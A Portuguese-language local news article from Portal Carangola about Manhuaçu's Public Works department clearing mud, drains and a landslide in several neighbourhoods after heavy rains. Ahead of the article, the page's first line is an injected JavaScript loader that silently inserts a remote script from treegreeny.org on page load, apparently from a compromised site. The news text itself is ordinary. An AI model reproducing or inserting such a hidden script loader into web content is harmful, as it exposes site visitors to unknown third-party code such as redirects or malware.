;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhuaçu - Obras realiza limpez após chuvas. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhuaçu – Obras realiza limpez após chuvas.

O Governo de Manhuaçu, por meio da Secretaria de Obras, está desencadeando uma operação de limpeza em vários bairros da cidade. O trabalho começou no Engenho da Serra e na Matinha.
Na manhã desta segunda-feira, 01, duas equipes se dividiram em duas frentes de trabalho. No Bairro Engenho da Serra, os servidores fizeram muito esforço para limpar bueiros e retirar a lama seca que estava espalhada nas ruas. Foi necessário o apoio de uma carregadeira, de um caminhão caçamba e do caminhão pipa. Mesmo com esse aparato, o serviço foi pesado, sendo necessário entrar em galerias e usar enxadas para atingir os pontos onde as máquinas não acessaram. Esses locais foram lavados posteriormente, garantindo um visual e um acesso diferentes do que era visto após as chuvas.
No Bairro Santana, a equipe realizou serviço parecido com o que foi feito no Engenho da Serra, com agravante de ter rua com passagem de pessoas e veículos comprometida. A enxurrada provocou deslizamento de barranco e em uma das ruas paralelas à creche, foi necessário desobstruir a via. Segundo o secretário de Obras, João Amâncio de Faria, esse tipo de atuação vai ser prioritário essa semana. “Temos outras demandas importantes, inclusive, que surgiram após o período chuvoso. Mas era necessário começar pela limpeza, porque tem rua que estava em condição muito ruim, até para andar a pé. Vamos resolver isso esta semana” – informou.
Enquanto parte da equipe da Secretaria de Obras trabalha na limpeza dos bairros, outro grupo atua na zona rural com a desobstrução das caixas de contensão que ficaram cheias após o período chuvoso.

Secretaria de Comunicação Social de Manhuaçu

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.